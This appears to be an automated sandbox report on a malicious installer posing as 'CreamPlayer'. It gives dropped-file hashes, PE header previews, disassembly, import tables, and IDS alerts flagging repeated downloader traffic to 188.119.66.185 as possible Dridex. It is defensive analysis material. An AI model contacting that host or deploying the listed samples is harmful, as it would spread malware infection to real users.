                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):445440
                                                                                                  Entropy (8bit):6.439135831549689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                  MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                  SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                  SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                  SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):499712
                                                                                                  Entropy (8bit):6.414789978441117
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                  MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                  SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                  SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                  SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348160
                                                                                                  Entropy (8bit):6.542655141037356
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                  MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                  SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                  SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                  SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):645592
                                                                                                  Entropy (8bit):6.50414583238337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):717985
                                                                                                  Entropy (8bit):6.51490048494207
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyFi:SPcYn5c/rPx37/zHBA6pFptZ1CE0qMRj
                                                                                                  MD5:56C3FA3352F751693DFC2275199FDE56
                                                                                                  SHA1:0C0D8556192FA79ADCACB4E0750C7310C91822F3
                                                                                                  SHA-256:7ADDEC9CDB89247B9BA11D6BA094C3C857D1D7B08A7FB7335593B9D0CC75E827
                                                                                                  SHA-512:210D4418410F07208EF0DBAE8EA10F6284EA0B8F445BB12CD2B1AF22F48E9FC7D18F21A5F9FCAE997B2BCDB5EE0D371AB59EFE8912C28789F0BF83DE84D5F4F2
                                                                                                  Malicious:true
                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:InnoSetup Log CreamPlayer, version 0x30, 4758 bytes, 414408\user, "C:\Users\user\AppData\Local\CreamPlayer 1.12"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4758
                                                                                                  Entropy (8bit):4.709606584516227
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:Oj4dWD38kpY8Y79g+eOIhe2ga7ICSss/Lni5WJRfwx7O/lxoxxp2:O8dWD3vpYjjHIhe2HICSsAni5iRfwx7I
                                                                                                  MD5:969DDFA64BF4D8287A205613749CEA65
                                                                                                  SHA1:337C2328CDB4C98A856D8C7FF395F8D175F5839F
                                                                                                  SHA-256:7D26A506CCA22E9571B989B9FB8DD6F5DCAEB55410D4044A27371AD8C1054451
                                                                                                  SHA-512:F01520796724D37CCAEF263CEE8029C1FCF9ACB933FF7224017066C4B7BDF66035A932AAF9A44EB4F0F0AF4A6A0CC5610E9B6D417A76E662495121253647A64D
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):717985
                                                                                                  Entropy (8bit):6.51490048494207
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyFi:SPcYn5c/rPx37/zHBA6pFptZ1CE0qMRj
                                                                                                  MD5:56C3FA3352F751693DFC2275199FDE56
                                                                                                  SHA1:0C0D8556192FA79ADCACB4E0750C7310C91822F3
                                                                                                  SHA-256:7ADDEC9CDB89247B9BA11D6BA094C3C857D1D7B08A7FB7335593B9D0CC75E827
                                                                                                  SHA-512:210D4418410F07208EF0DBAE8EA10F6284EA0B8F445BB12CD2B1AF22F48E9FC7D18F21A5F9FCAE997B2BCDB5EE0D371AB59EFE8912C28789F0BF83DE84D5F4F2
                                                                                                  Malicious:true
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2560
                                                                                                  Entropy (8bit):2.8818118453929262
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                  MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                  SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                  SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                  SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):4.289297026665552
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                  MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                  SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                  SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                  SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23312
                                                                                                  Entropy (8bit):4.596242908851566
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\Desktop\bzX2pV3Ybw.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):706560
                                                                                                  Entropy (8bit):6.506367491472476
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CE0qMRU
                                                                                                  MD5:726BF37850FF846984004440C4875481
                                                                                                  SHA1:38FC5C0BE1FF27378F548A61A299183B2AA690DC
                                                                                                  SHA-256:D63972B415BC36A573543D82E2AEF4EF4C17F2F7C3429DDC94B65A309961BE12
                                                                                                  SHA-512:163B223658B138BFDC169EDE67DD5552421155259360E06FC00016FF6255527F2F658FC5411863BEA90F4C79C861758DCC881164360AD43C9E108DFA10875DD3
                                                                                                  Malicious:true
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.998310567880892
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:bzX2pV3Ybw.exe
                                                                                                  File size:4'096'896 bytes
                                                                                                  MD5:cd6081e11eb60abfa77c3b587726d83f
                                                                                                  SHA1:f1573e60caa0aa5b8a75584f2ec8f14c1ad005bf
                                                                                                  SHA256:efbf1bcbd351efeab32b9279284c5fa064210e2d8e42d896cc065c2d60f6fe49
                                                                                                  SHA512:aa4da89f55a6e13665c5e434e75aaafdf9f82b7a6d9ab3bfaf759ff2751885748cfc7dd3b5d520b20b10c8a4aba6099fe8cd95173622e63dfa30b3ccb6b511a1
                                                                                                  SSDEEP:98304:M45f7IPRVWvpkvi+bul5SFrnWTLSNwUbwP380d60+njcX:L5fPvKiQI8RnI3nd60hX
                                                                                                  TLSH:731633637D286579F88141B09FB8C53B40573A29ADF80E8533C849DFAF7B42BE549B24
                                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                                  Entrypoint:0x40a5f8
                                                                                                  Entrypoint Section:CODE
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:1
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:1
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:1
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFC4h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  xor eax, eax
                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                  mov dword ptr [ebp-24h], eax
                                                                                                  call 00007FD8CD2A9173h
                                                                                                  call 00007FD8CD2AA37Ah
                                                                                                  call 00007FD8CD2AA609h
                                                                                                  call 00007FD8CD2AA6ACh
                                                                                                  call 00007FD8CD2AC64Bh
                                                                                                  call 00007FD8CD2AEFB6h
                                                                                                  call 00007FD8CD2AF11Dh
                                                                                                  xor eax, eax
                                                                                                  push ebp
                                                                                                  push 0040ACC9h
                                                                                                  push dword ptr fs:[eax]
                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                  xor edx, edx
                                                                                                  push ebp
                                                                                                  push 0040AC92h
                                                                                                  push dword ptr fs:[edx]
                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                  mov eax, dword ptr [0040C014h]
                                                                                                  call 00007FD8CD2AFBCBh
                                                                                                  call 00007FD8CD2AF7B6h
                                                                                                  cmp byte ptr [0040B234h], 00000000h
                                                                                                  je 00007FD8CD2B06AEh
                                                                                                  call 00007FD8CD2AFCC8h
                                                                                                  xor eax, eax
                                                                                                  call 00007FD8CD2A9E69h
                                                                                                  lea edx, dword ptr [ebp-10h]
                                                                                                  xor eax, eax
                                                                                                  call 00007FD8CD2ACC5Bh
                                                                                                  mov edx, dword ptr [ebp-10h]
                                                                                                  mov eax, 0040CE28h
                                                                                                  call 00007FD8CD2A920Ah
                                                                                                  push 00000002h
                                                                                                  push 00000000h
                                                                                                  push 00000001h
                                                                                                  mov ecx, dword ptr [0040CE28h]
                                                                                                  mov dl, 01h
                                                                                                  mov eax, 0040738Ch
                                                                                                  call 00007FD8CD2AD4EAh
                                                                                                  mov dword ptr [0040CE2Ch], eax
                                                                                                  xor edx, edx
                                                                                                  push ebp
                                                                                                  push 0040AC4Ah
                                                                                                  push dword ptr fs:[edx]
                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                  call 00007FD8CD2AFC26h
                                                                                                  mov dword ptr [0040CE34h], eax
                                                                                                  mov eax, dword ptr [0040CE34h]
                                                                                                  cmp dword ptr [eax+0Ch], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9d30 | 0x9e00 | c3bd95c4b1a8e5199981e0d9b45fd18c | False | 0.6052709651898734 | data | 6.631765876950794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x250 | 0x400 | 1ee71d84f1c77af85f1f5c278f880572 | False | 0.306640625 | data | 2.751820662285145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe8c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 132cb60f5a9e2cec1ef3174f1a090924 | False | 0.3252840909090909 | data | 4.490561587242899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.25709779179810727
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T14:08:29.588842+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49844 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:30.291348+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49844 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:35.159950+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49858 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:35.895027+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49858 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:37.467591+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49864 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:38.163965+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49864 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:39.877945+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:40.572408+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:42.381332+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49880 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:43.099381+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49880 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:44.699486+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49886 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:45.394193+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49886 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:46.971425+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49892 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:47.666729+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49892 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:49.443045+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49898 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:50.137691+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49898 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:51.908215+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49904 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:52.602609+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49904 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:54.447882+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:55.148331+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:56.927354+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49913 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:57.628951+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49913 | 188.119.66.185 | 443 | TCP
2024-12-14T14:08:59.449951+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49919 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:00.148989+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49919 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:01.721611+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49925 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:02.419889+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49925 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:04.010229+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49931 | 188.119.66.185 | 443 | TCP
